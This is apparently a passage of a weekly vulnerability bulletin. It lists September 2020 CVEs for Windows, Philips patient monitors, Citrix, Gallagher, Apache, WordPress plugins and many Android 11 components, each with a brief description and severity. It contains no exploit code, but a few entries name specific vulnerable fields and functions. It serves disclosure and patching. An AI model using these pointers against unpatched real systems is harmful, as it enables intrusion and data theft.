    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1589, CVE-2020-1592. 2020-09-11 2.1 CVE-2020-16854
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when a Windows Projected Filesystem improperly handles file redirections, aka 'Projected Filesystem Information Disclosure Vulnerability'. 2020-09-11 2.1 CVE-2020-16879
    N/A
    microsoft -- windows_10 A security feature bypass vulnerability exists when a Windows Projected Filesystem improperly handles file redirections, aka 'Projected Filesystem Security Feature Bypass Vulnerability'. 2020-09-11 2.1 CVE-2020-0805
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0928, CVE-2020-1033, CVE-2020-1592, CVE-2020-16854. 2020-09-11 2.1 CVE-2020-1589
    N/A
    microsoft -- windows_10 An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1083. 2020-09-11 2.1 CVE-2020-0921
    N/A
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is then used as a webpage and served to other users. Successful exploitation could lead to unauthorized access to patient data via a read-only web application. 2020-09-11 2.7 CVE-2020-16218
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The software parses a formatted message or structure but does not handle or incorrectly handles a length field that is inconsistent with the actual length of the associated data, causing the application on the surveillance station to restart. 2020-09-11 3.3 CVE-2020-16224
    MISC
    philips -- patient_information_center_ix Patient Information Center iX (PICiX) Versions B.02, C.02, C.03, PerformanceBridge Focal Point Version A.01, IntelliVue patient monitors MX100, MX400-MX850, and MP2-MP90 Versions N and prior, IntelliVue X3 and X2 Versions N and prior. The product receives input that is expected to be well-formed (i.e., to comply with a certain syntax) but it does not validate or incorrectly validates that the input complies with the syntax, causing the certificate enrollment service to crash. It does not impact monitoring but prevents new devices from enrolling. 2020-09-11 3.3 CVE-2020-16220
    MISC
    recall-products_project -- recall-products WordPress Plugin Store / Mike Rooijackers Recall Products V0.8 is affected by: Cross Site Scripting (XSS) via the 'Recall Settings' field in admin.php. An attacker can inject JavaScript code that will be stored and executed. 2020-09-14 3.5 CVE-2020-25380
    MISC
    redhat -- ansible_engine An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest threat from this vulnerability is to data confidentiality. 2020-09-11 2.1 CVE-2020-14330
    CONFIRM
    MISC
    softrade -- wp_smart_crm_&_invoices WordPress Plugin Store / SoftradeWeb SNC WP SMART CRM V1.8.7 is affected by: Cross Site Scripting via the Business Name field, Tax Code field, First Name field, Address field, Town field, Phone field, Mobile field, Place of Birth field, Web Site field, VAT Number field, Last Name field, Fax field, Email field, and Skype field. 2020-09-14 3.5 CVE-2020-25375
    MISC

    Severity Not Yet Assigned

    Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
    1crm -- 1crm_system
     
    An issue was discovered in 1CRM System through 8.6.7. An insecure direct object reference to internally stored files allows a remote attacker to access various sensitive information via an unauthenticated request with a predictable URL. 2020-09-18 not yet calculated CVE-2020-15958
    MISC
    MISC
    MISC
    MISC
    adobe -- media_encoder
     
    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9745
    MISC
    adobe -- media_encoder
     
    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9739
    MISC
    adobe -- media_encoder
     
    Adobe Media Encoder version 14.3.2 (and earlier versions) has an out-of-bounds read vulnerability that could be exploited to read past the end of an allocated buffer, possibly resulting in a crash or disclosure of sensitive information from other memory locations. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-09-18 not yet calculated CVE-2020-9744
    MISC
    alfresco -- alfresco
     
    The Reset Password add-on before 1.2.0 for Alfresco suffers from CMIS-SQL Injection, which allows a malicious user to inject a query within the email input field. 2020-09-17 not yet calculated CVE-2020-25727
    MISC
    alfresco -- alfresco
     
    The Reset Password add-on before 1.2.0 for Alfresco has a broken algorithm (involving an increment) that allows a malicious user to change any user's account password, including the admin account. 2020-09-17 not yet calculated CVE-2020-25728
    MISC
    alfresco -- alfresco
     
    The Alfresco Reset Password add-on before version 1.2.0 relies on untrusted inputs in a security decision. Intruders can get admin access to the system using the vulnerability in the project. Impacts all servers where this add-on is installed. The problem is fixed in version 1.2.0. 2020-09-18 not yet calculated CVE-2020-15181
    MISC
    CONFIRM
    amq -- online_console
     
    It was found in AMQ Online before 1.5.2 that injecting an invalid field to a user's AddressSpace configuration of the user namespace puts AMQ Online in an inconsistent state, where the AMQ Online components do not operate properly, such as the failure of provisioning and the failure of creating addresses, though this does not impact upon already existing messaging clients or brokers. 2020-09-16 not yet calculated CVE-2020-14348
    MISC
    apache -- airflow
     
    In Apache Airflow < 1.10.12, the "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to an XSS exploit. 2020-09-17 not yet calculated CVE-2020-13944
    MISC
    apache -- atlas
     
    Apache Atlas before 2.1.0 contains an XSS vulnerability. While saving a search or rendering elements, values are not sanitized correctly, which triggers the XSS vulnerability. 2020-09-16 not yet calculated CVE-2020-13928
    MISC
    apache -- superset
     
    While investigating a bug report on Apache Superset, it was determined that an authenticated user could craft requests via a number of templated text fields in the product that would allow arbitrary access to Python's `os` package in the web application process in versions < 0.37.1. It was thus possible for an authenticated user to list and access files, environment variables, and process information. Additionally it was possible to set environment variables for the current process, create and update files in folders writable by the web process, and execute arbitrary programs accessible by the web process. All other operations available to the `os` package in Python were also available, even if not explicitly enumerated in this CVE. 2020-09-17 not yet calculated CVE-2020-13948
    MISC
    apache -- syncope
     
    In Apache Syncope 2.1.X releases prior to 2.1.7, when the Flowable extension is enabled, an administrator with workflow entitlements can use Shell Service Tasks to perform malicious operations, including but not limited to file read, file write, and code execution. 2020-09-15 not yet calculated CVE-2020-11977
    MISC
    bosch -- smart_home_system
     
    Improper certificate validation for certain connections in the Bosch Smart Home System App for iOS prior to version 9.17.1 potentially allows an attacker to intercept video contents by performing a man-in-the-middle attack. 2020-09-16 not yet calculated CVE-2020-6781
    MISC
    buffalo -- airstation_whr-g54s
     
    Directory traversal vulnerability in WHR-G54S firmware 1.43 and earlier allows an attacker to access sensitive information such as setting values via unspecified vectors. 2020-09-18 not yet calculated CVE-2020-5605
    MISC
    MISC
    buffalo -- airstation_whr-g54s
     
    Cross-site scripting vulnerability in WHR-G54S firmware 1.43 and earlier allows remote attackers to inject arbitrary script via a specially crafted page. 2020-09-18 not yet calculated CVE-2020-5606
    MISC
    MISC
    citrix -- multiple_products
     
    Improper Input Validation on Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b leads to an HTML Injection attack against the SSL VPN web portal. 2020-09-18 not yet calculated CVE-2020-8245
    MISC
    citrix -- multiple_products
     
    Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to a denial of service attack originating from the management network. 2020-09-18 not yet calculated CVE-2020-8246
    MISC
    citrix -- multiple_products
     
    Citrix ADC and Citrix Gateway 13.0 before 13.0-64.35, Citrix ADC and NetScaler Gateway 12.1 before 12.1-58.15, Citrix ADC 12.1-FIPS before 12.1-55.187, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1 before 11.1-65.12, Citrix SD-WAN WANOP 11.2 before 11.2.1a, Citrix SD-WAN WANOP 11.1 before 11.1.2a, Citrix SD-WAN WANOP 11.0 before 11.0.3f, Citrix SD-WAN WANOP 10.2 before 10.2.7b are vulnerable to escalation of privileges on the management interface. 2020-09-18 not yet calculated CVE-2020-8247
    MISC
    citrix -- multiple_xenmobile_servers
     
    Improper authentication in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 leads to the ability to access sensitive files. 2020-09-18 not yet calculated CVE-2020-8253
    MISC
    citrix -- storefront_server
     
    Improper authentication in Citrix StoreFront Server < 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server. 2020-09-18 not yet calculated CVE-2020-8200
    MISC
    colin_percival -- bsdiff
     
    A memory corruption vulnerability is present in bspatch as shipped in Colin Percival's bsdiff tools version 4.3. Insufficient checks when handling external inputs allow an attacker to bypass the sanity checks in place and write outside the boundaries of a dynamically allocated buffer. 2020-09-16 not yet calculated CVE-2020-14315
    MISC
    MISC
    MISC
    d-link -- dir-816L_and_dir-803_devices
     
    ** UNSUPPORTED WHEN ASSIGNED ** webinc/js/info.php on D-Link DIR-816L 2.06.B09_BETA and DIR-803 1.04.B02 devices allows XSS via the HTTP Referer header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: this is typically not exploitable because of URL encoding (except in Internet Explorer) and because a web page cannot specify that a client should make an additional HTTP request with an arbitrary Referer header. 2020-09-19 not yet calculated CVE-2020-25786
    MISC
    MISC
    dotplant2 -- dotplant2
     
    ** UNSUPPORTED WHEN ASSIGNED ** An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-09-18 not yet calculated CVE-2020-25750
    MISC
    elkarbackup -- elkarbackup
     
    A Sensitive Source Code Path Disclosure vulnerability is found in ElkarBackup v1.3.3. An attacker is able to view the path of the source code jobs/sort, where the entire source code path is displayed in the browser itself, helping the attacker identify the code structure /app/elkarbackup/src/Binovo/ElkarBackupBundle/Controller/DefaultController.php. 2020-09-15 not yet calculated CVE-2020-24925
    MISC
    MISC
    ewon -- flexy_and_cosy
     
    All versions of Ewon Flexy and Cosy prior to 14.1 use wildcards such as (*) under which domains can request resources. An attacker with local access and high privileges could inject scripts into the Cross-origin Resource Sharing (CORS) configuration that could abuse this vulnerability, allowing the attacker to retrieve limited confidential information through sniffing. 2020-09-18 not yet calculated CVE-2020-16230
    MISC
    fasterxml -- jackson-databind
     
    FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. 2020-09-17 not yet calculated CVE-2020-24750
    MISC
    freebox -- freebox_hd
     
    A DNS rebinding vulnerability in Freebox HD before 1.5.29. 2020-09-16 not yet calculated CVE-2020-24374
    MISC
    freebox -- freebox_server
     
    A DNS rebinding vulnerability in the Freebox OS web interface in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24377
    MISC
    freebox -- upnp_idg
     
    A DNS rebinding vulnerability in the UPnP IGD implementations in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24376
    MISC
    freebox -- upnp_mediaserver
     
    A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. 2020-09-16 not yet calculated CVE-2020-24373
    MISC
    fwupd -- fwupd
     
    A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity. 2020-09-15 not yet calculated CVE-2020-10759
    MISC
    MISC
    gallagher -- command_centre
     
    On controllers running versions of v8.20 prior to vCR8.20.200221b (distributed in v8.20.1093(MR2)), v8.10 prior to vGR8.10.179 (distributed in v8.10.1211(MR5)), v8.00 prior to vGR8.00.165 (distributed in v8.00.1228(MR6)), v7.90 prior to vGR7.90.165 (distributed in v7.90.1038(MRX)), v7.80 or earlier, it is possible to retrieve site keys used for securing MIFARE Plus and Desfire using debug ports on T Series readers. 2020-09-15 not yet calculated CVE-2020-16097
    MISC
    gallagher -- command_centre
     
    In Gallagher Command Centre versions 8.10 prior to 8.10.1134(MR4), 8.00 prior to 8.00.1161(MR5), 7.90 prior to 7.90.991(MR5), 7.80 prior to 7.80.960(MR2), 7.70 and earlier, any operator account has access to all data that would be replicated if the system were to be (or is) attached to a multi-server environment. This can include plain text credentials for DVR systems and card details used for physical access/alarm/perimeter components. 2020-09-15 not yet calculated CVE-2020-16096
    MISC
    gallagher -- command_centre
     
    It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service due to an out-of-bounds buffer access. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. 2020-09-15 not yet calculated CVE-2020-16101
    MISC
    gallagher -- command_centre
     
    It is possible for an unauthenticated remote DCOM websocket connection to crash the Command Centre service's DCOM websocket thread due to improper shutdown of closed websocket connections, preventing it from accepting future DCOM websocket (Configuration Client) connections. Affected versions are v8.20 prior to v8.20.1166(MR3), v8.10 prior to v8.10.1211(MR5), v8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. 2020-09-15 not yet calculated CVE-2020-16100
    MISC
    gallagher -- command_centre
     
    In Gallagher Command Centre v8.20 prior to v8.20.1093(MR2) it is possible to create Guard Tour events that when accessed via things like reporting cause clients to temporarily hang or disconnect. 2020-09-15 not yet calculated CVE-2020-16099
    MISC
    gallagher -- command_centre
     
    It is possible to enumerate access card credentials via an unauthenticated network connection to the server in versions of Command Centre v8.20 prior to v8.20.1166(MR3), versions of 8.10 prior to v8.10.1211(MR5), versions of 8.00 prior to v8.00.1228(MR6), all versions of 7.90 and earlier. These credentials can then be used to encode low security cards to be used by the system where insecure card technologies are supported. 2020-09-15 not yet calculated CVE-2020-16098
    MISC
    genexis -- platinum_4410
     
    A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices, was found to be vulnerable to Broken Access Control and CSRF, which could be combined to remotely change the Wi-Fi access point's password. 2020-09-16 not yet calculated CVE-2020-25015
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The profile activity page was not restricting the amount of results one could request, potentially resulting in a denial of service. 2020-09-14 not yet calculated CVE-2020-13315
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab
     
    A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was vulnerable to a blind SSRF attack through the repository mirroring feature. 2020-09-14 not yet calculated CVE-2020-13309
    CONFIRM
    MISC
    MISC
    gnuplot -- gnuplot
     
    gnuplot 5.4 is affected by a segmentation fault in com_line () at command.c, which may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-25412
    MISC
    gnuplot -- gnuplot
     
    gnuplot 5.5 is affected by double free when executing print_set_output. This may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-25559
    MISC
    google -- android_10_and_11_devices In the app zygote SE Policy, there is a possible permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11. Android ID: A-157598026. 2020-09-17 not yet calculated CVE-2020-0390
    MISC
    google -- android_10_and_11_devices In RunInternal of dumpstate.cpp, there is a possible user consent bypass due to an uncaught exception. This could lead to local information disclosure of bug report data with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-152944488. 2020-09-17 not yet calculated CVE-2020-0382
    MISC
    google -- android_10_and_11_devices
     
    In createEmergencyLocationUserNotification of GnssVisibilityControl.java, there is a possible permissions bypass due to an empty mutable PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-156123285. 2020-09-17 not yet calculated CVE-2020-0388
    MISC
    google -- android_10_and_11_devices
     
    In createSaveNotification of RecordingService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11. Android ID: A-156959408. 2020-09-17 not yet calculated CVE-2020-0389
    MISC
    google -- android_11_devices In iorap, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege and code execution with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150331085. 2020-09-17 not yet calculated CVE-2020-0330
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure. System execution privileges, a Firmware compromise, and User interaction are needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-144506224 2020-09-18 not yet calculated CVE-2020-0282
    MISC
    google -- android_11_devices In libmedia, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-132274514 2020-09-17 not yet calculated CVE-2020-0363
    MISC
    google -- android_11_devices In WindowManager, there is a possible launch of an unexpected app due to a confused deputy. This could lead to local escalation of privilege due to launching a malicious app instead of the one the user intended, with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-139128211 2020-09-17 not yet calculated CVE-2020-0267
    MISC
    google -- android_11_devices In UrlQuerySanitizer, there is a possible improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-73822755 2020-09-17 not yet calculated CVE-2020-0333
    MISC
    google -- android_11_devices In factory reset protection, there is a possible FRP bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-111086459 2020-09-17 not yet calculated CVE-2020-0266
    MISC
    google -- android_11_devices In libDRCdec, there is a possible information disclosure due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-151927433 2020-09-17 not yet calculated CVE-2020-0361
    MISC
    google -- android_11_devices In the System UI, there is a possible system crash due to an uncaught exception. This could lead to local permanent denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-33646131 2020-09-18 not yet calculated CVE-2020-0318
    MISC
    google -- android_11_devices In DisplayManager, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-144920149 2020-09-17 not yet calculated CVE-2020-0341
    MISC
    google -- android_11_devices In Bluetooth, there is a possible spoofing of bluetooth device metadata due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-145130119 2020-09-18 not yet calculated CVE-2020-0299
    MISC
    google -- android_11_devices In the OMX parser, there is a possible information disclosure due to a returned raw pointer. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-120781925 2020-09-17 not yet calculated CVE-2020-0274
    MISC
    google -- android_11_devices In DocumentsUI, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-144286721 2020-09-17 not yet calculated CVE-2020-0345
    MISC
    google -- android_11_devices In LLVM, there is a possible ineffective stack cookie placement due to stack frame double reservation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-139666480 2020-09-17 not yet calculated CVE-2020-0306
    MISC
    google -- android_11_devices In Window Manager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-153654357 2020-09-17 not yet calculated CVE-2020-0308
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137868765 2020-09-18 not yet calculated CVE-2020-0319
    MISC
    google -- android_11_devices In libFraunhoferAAC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-141883493 2020-09-17 not yet calculated CVE-2020-0355
    MISC
    google -- android_11_devices In ActivityManager, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-119673147 2020-09-17 not yet calculated CVE-2020-0372
    MISC
    google -- android_11_devices In SurfaceFlinger, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150227563 2020-09-17 not yet calculated CVE-2020-0358
    MISC
    google -- android_11_devices In libDRCdec, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137282770 2020-09-17 not yet calculated CVE-2020-0364
    MISC
    google -- android_11_devices In Mediaserver, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege if integer sanitization were not enabled (which it is by default), with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-147002762 2020-09-17 not yet calculated CVE-2020-0346
    MISC
    google -- android_11_devices In SyncManager, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-154921790 2020-09-17 not yet calculated CVE-2020-0426
    MISC
    google -- android_11_devices In AudioService, there are missing permission checks. This could lead to local information disclosure of audio configuration with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-154934920 2020-09-17 not yet calculated CVE-2020-0314
    MISC
    google -- android_11_devices In Bluetooth, there is a possible control over Bluetooth enabled state due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-145129266 2020-09-18 not yet calculated CVE-2020-0298
    MISC
    google -- android_11_devices In Notification Access Confirmation, there is a possible permissions bypass due to uninformed consent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-145129456 2020-09-17 not yet calculated CVE-2020-0360
    MISC
    google -- android_11_devices There is a possible way to view notifications even when the "Lockdown" feature is on. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124000380 2020-09-17 not yet calculated CVE-2020-0425
    MISC
    google -- android_11_devices In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-123237930 2020-09-17 not yet calculated CVE-2020-0362
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over NFC with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-139188582 2020-09-18 not yet calculated CVE-2020-0348
    MISC
    google -- android_11_devices In SurfaceFlinger, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150225569 2020-09-17 not yet calculated CVE-2020-0357
    MISC
    google -- android_11_devices In the Audio HAL, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-143787559 2020-09-17 not yet calculated CVE-2020-0356
    MISC
    google -- android_11_devices In Bluetooth, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-143604331 2020-09-18 not yet calculated CVE-2020-0354
    MISC
    google -- android_11_devices In libmp4extractor, there is a possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124777526 2020-09-17 not yet calculated CVE-2020-0353
    MISC
    google -- android_11_devices In MediaProvider, there is a possible permissions bypass due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-132074310 2020-09-17 not yet calculated CVE-2020-0352
    MISC
    google -- android_11_devices In libstagefright, there is possible CPU exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124777537 2020-09-17 not yet calculated CVE-2020-0351
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-139424089 2020-09-18 not yet calculated CVE-2020-0350
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds read due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-148736216 2020-09-18 not yet calculated CVE-2020-0300
    MISC
    google -- android_11_devices In MediaProvider, there is a possible bypass of a permissions check due to a confused deputy. This could lead to local information disclosure, with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124329382 2020-09-17 not yet calculated CVE-2020-0337
    MISC
    google -- android_11_devices In iptables, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-136658008 2020-09-18 not yet calculated CVE-2020-0347
    MISC
    google -- android_11_devices In libstagefright, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-116718596 2020-09-17 not yet calculated CVE-2020-0264
    MISC
    google -- android_11_devices In NetworkStackNotifier, there is a possible permissions bypass due to an unsafe implicit PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-157475111 2020-09-18 not yet calculated CVE-2020-0405
    MISC
    google -- android_11_devices In libmpeg2dec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if another exploit allowed this to be triggered with different parameters, with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137794014 2020-09-17 not yet calculated CVE-2020-0406
    MISC
    google -- android_11_devices In Telephony, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege and the setting of supported EUICC countries with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-156253476 2020-09-17 not yet calculated CVE-2020-0375
    MISC
    google -- android_11_devices In NFC, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-156251602 2020-09-17 not yet calculated CVE-2020-0374
    MISC
    google -- android_11_devices In SoundTriggerHwService, there is a possible out of bounds read due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-146894086 2020-09-17 not yet calculated CVE-2020-0373
    MISC
    google -- android_11_devices In libAACdec, there is a possible out of bounds read due to missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-112051700 2020-09-17 not yet calculated CVE-2020-0370
    MISC
